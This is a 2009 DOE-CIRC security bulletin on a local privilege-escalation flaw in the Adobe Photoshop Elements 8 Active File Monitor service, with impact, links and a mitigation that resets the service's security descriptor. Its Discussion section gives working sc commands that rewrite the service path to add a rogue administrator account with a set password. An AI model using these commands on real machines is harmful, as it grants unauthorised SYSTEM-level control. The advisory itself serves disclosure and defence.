Privacy and Legal Notice

DOE-CIRC TECHNICAL BULLETIN

T-242: Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability

September 30, 2009 15:00 GMT
PROBLEM: Adobe Photoshop Elements is prone to a local privilege-escalation vulnerability because the application has insufficient protections in a security descriptor.
PLATFORM: Adobe Photoshop Elements 8.0
ABSTRACT: A local user in the 'Users' group can stop the service, invoke the 'sc config' command to replace the path with an arbitrary path, and then restart the service to execute arbitrary code with System privileges.
LINKS:  
  DOE-CIRC BULLETIN: http://www.doecirc.energy.gov/bulletins/t-242.shtml
  OTHER LINKS: Security Focus
http://www.securityfocus.com/bid/36542/info
Adobe Website
http://www.adobe.com/products/photoshopelwin/

IMPACT ASSESSMENT: This risk is medium. Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will completely compromise an affected computer. 
Discussion:
The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.  A malicious user of the Users group (which on xp means a "limited account") can stop the service, then invoke the "sc config" command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password "kills"

Mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

Note the WO and WD permission for Everyone

Change the security descriptor like the following:

c:\sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

Currently, there are no vendor supplied patches.
DOE-CIRC services are available to DOE, DOE Contractors, and the NIH. DOE-CIRC can be contacted at: 
    Voice:          866-941-2472
    E-mail:          doecirc@doecirc.energy.gov
    World Wide Web:  http://www.doecirc.energy.gov
UCRL-MI-119788